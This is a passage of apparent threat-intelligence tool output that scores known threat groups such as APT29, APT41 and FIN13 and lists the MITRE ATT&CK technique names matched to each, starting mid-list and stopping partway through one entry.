  • T1087.002 - Domain Account
  • T1586.002 - Email Accounts
  • T1684 - Social Engineering
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode

Earth Lusca

Score: 50.78
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1059.009 - Cloud API
  • T1557.003 - DHCP Spoofing
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1059.011 - Lua
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1027.018 - Invisible Unicode

Threat Group-3390

Score: 35.23
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.003 - CMSTP
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries

Patchwork

Score: 30.83
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1001.003 - Protocol or Service Impersonation
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1008 - Fallback Channels

Medusa Group

Score: 48.60
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1547.012 - Print Processors
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1218.003 - CMSTP
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1598 - Phishing for Information
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution

APT29

Score: 62.87
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1202 - Indirect Command Execution
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1138 - Application Shimming
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1218.009 - Regsvcs/Regasm
  • T1555.004 - Windows Credential Manager
  • T1547.013 - XDG Autostart Entries
  • T1608.006 - SEO Poisoning
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver

ZIRCONIUM

Score: 27.32
Matched TTPs:
  • T1685.001 - Disable or Modify Windows Event Log
  • T1566.002 - Spearphishing Link
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1547.002 - Authentication Package
  • T1547.013 - XDG Autostart Entries
  • T1608.006 - SEO Poisoning
  • T1027.018 - Invisible Unicode

Leviathan

Score: 44.63
Matched TTPs:
  • T1685.001 - Disable or Modify Windows Event Log
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1497.002 - User Activity Based Checks
  • T1554 - Compromise Host Software Binary
  • T1055.014 - VDSO Hijacking
  • T1157 - Dylib Hijacking
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1001.003 - Protocol or Service Impersonation
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode

Daggerfly

Score: 15.15
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1497.002 - User Activity Based Checks
  • T1174 - Password Filter DLL
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode

GALLIUM

Score: 28.77
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1174 - Password Filter DLL
  • T1134 - Access Token Manipulation
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

FIN13

Score: 41.90
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1569.002 - Service Execution
Link to MITRE →

Ke3chang

Score: 28.48
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

APT41

Score: 73.52
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1059.008 - Network Device CLI
  • T1497.002 - User Activity Based Checks
  • T1041 - Exfiltration Over C2 Channel
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1001.003 - Protocol or Service Impersonation
  • T1564.003 - Hidden Window
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1574.002 - DLL Side-Loading
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
  • T1008 - Fallback Channels
Link to MITRE →

APT5

Score: 14.23
Matched TTPs:
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
Link to MITRE →

menuPass

Score: 31.38
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1174 - Password Filter DLL
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
Link to MITRE →

Wizard Spider

Score: 43.36
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1038 - DLL Search Order Hijacking
  • T1059.009 - Cloud API
  • T1003.001 - LSASS Memory
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1001.003 - Protocol or Service Impersonation
  • T1556.009 - Conditional Access Policies
  • T1134 - Access Token Manipulation
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Axiom

Score: 28.50
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1175 - Component Object Model and Distributed COM
  • T1049 - System Network Connections Discovery
  • T1157 - Dylib Hijacking
  • T1114.002 - Remote Email Collection
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1160 - Launch Daemon
Link to MITRE →

HEXANE

Score: 32.46
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1027.016 - Junk Code Insertion
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1547.002 - Authentication Package
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

UNC3886

Score: 23.16
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1556.002 - Password Filter DLL
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
Link to MITRE →

LuminousMoth

Score: 18.22
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1059.009 - Cloud API
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

Salt Typhoon

Score: 11.29
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
Link to MITRE →

Play

Score: 16.05
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Aoqin Dragon

Score: 8.71
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1219.001 - IDE Tunneling
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
Link to MITRE →

RedCurl

Score: 23.03
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1574.010 - Services File Permissions Weakness
  • T1059.011 - Lua
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1027.018 - Invisible Unicode
Link to MITRE →

Moses Staff

Score: 10.77
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

TeamTNT

Score: 35.81
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1586.002 - Email Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1519 - Emond
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Sidewinder

Score: 25.04
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1497.002 - User Activity Based Checks
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

Gallmaker

Score: 6.62
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1497.002 - User Activity Based Checks
  • T1059.011 - Lua
Link to MITRE →

BITTER

Score: 12.25
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

TA505

Score: 32.40
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1138 - Application Shimming
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

Malteiro

Score: 8.33
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History
  • T1027.010 - Command Obfuscation
Link to MITRE →

APT12

Score: 4.68
Matched TTPs:
  • T1087.002 - Domain Account
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
Link to MITRE →

Machete

Score: 8.60
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1027.018 - Invisible Unicode
Link to MITRE →

Elderwood

Score: 6.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

Transparent Tribe

Score: 6.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1027.018 - Invisible Unicode
Link to MITRE →

WIRTE

Score: 8.93
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

RTM

Score: 10.50
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1565.002 - Transmitted Data Manipulation
  • T1059.012 - Hypervisor CLI
  • T1008 - Fallback Channels
Link to MITRE →

APT-C-36

Score: 6.10
Matched TTPs:
  • T1087.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

CURIUM

Score: 19.53
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1175 - Component Object Model and Distributed COM
  • T1497.002 - User Activity Based Checks
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.008 - LSASS Driver
Link to MITRE →

Tropic Trooper

Score: 30.04
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1555.003 - Credentials from Web Browsers
  • T1003.001 - LSASS Memory
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1136.003 - Cloud Account
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1209 - Time Providers
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

PLATINUM

Score: 12.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1686 - Disable or Modify System Firewall
Link to MITRE →

TA551

Score: 11.87
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code
  • T1562.011 - Spoof Security Alerting
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

FIN8

Score: 18.77
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.009 - Cloud API
  • T1027.017 - SVG Smuggling
  • T1612 - Build Image on Host
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

LazyScripter

Score: 18.62
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

Higaisa

Score: 11.38
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1590.006 - Network Security Appliances
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1569.002 - Service Execution
Link to MITRE →

Rancor

Score: 6.25
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

FIN4

Score: 9.11
Matched TTPs:
  • T1087.002 - Domain Account
  • T1574.010 - Services File Permissions Weakness
  • T1157 - Dylib Hijacking
  • T1027.010 - Command Obfuscation
  • T1027.018 - Invisible Unicode
Link to MITRE →

Storm-1811

Score: 21.03
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact
  • T1565.002 - Transmitted Data Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1547.008 - LSASS Driver
Link to MITRE →

Inception

Score: 19.04
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
Link to MITRE →

EXOTIC LILY

Score: 14.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1612 - Build Image on Host
  • T1690 - Prevent Command History Logging
  • T1218.010 - Regsvr32
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
Link to MITRE →

Ajax Security Team

Score: 6.14
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.013 - XDG Autostart Entries
  • T1547.008 - LSASS Driver
Link to MITRE →

Saint Bear

Score: 12.05
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1059.009 - Cloud API
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1027.018 - Invisible Unicode
Link to MITRE →

FIN6

Score: 24.65
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1612 - Build Image on Host
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1505 - Server Software Component
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
  • T1547.008 - LSASS Driver
Link to MITRE →

Whitefly

Score: 4.15
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

TA459

Score: 4.48
Matched TTPs:
  • T1087.002 - Domain Account
  • T1497.002 - User Activity Based Checks
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
Link to MITRE →

Nomadic Octopus

Score: 4.55
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1497.002 - User Activity Based Checks
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Gorgon Group

Score: 9.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1059.009 - Cloud API
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

APT19

Score: 13.55
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1059.009 - Cloud API
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1059.012 - Hypervisor CLI
Link to MITRE →

TA2541

Score: 19.02
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

SideCopy

Score: 16.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Tonto Team

Score: 12.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Andariel

Score: 14.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1136.002 - Domain Account
  • T1187 - Forced Authentication
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Naikon

Score: 7.30
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
Link to MITRE →

Molerats

Score: 12.03
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1497.002 - User Activity Based Checks
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

admin@338

Score: 7.57
Matched TTPs:
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32
Link to MITRE →

Darkhotel

Score: 16.73
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1059.010 - AutoHotKey & AutoIT
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1564.002 - Hidden Users
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

IndigoZebra

Score: 4.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

APT33

Score: 16.22
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1027.016 - Junk Code Insertion
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

Confucius

Score: 12.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

BlackTech

Score: 9.46
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1209 - Time Providers
  • T1027.018 - Invisible Unicode
Link to MITRE →

Windshift

Score: 15.84
Matched TTPs:
  • T1087.002 - Domain Account
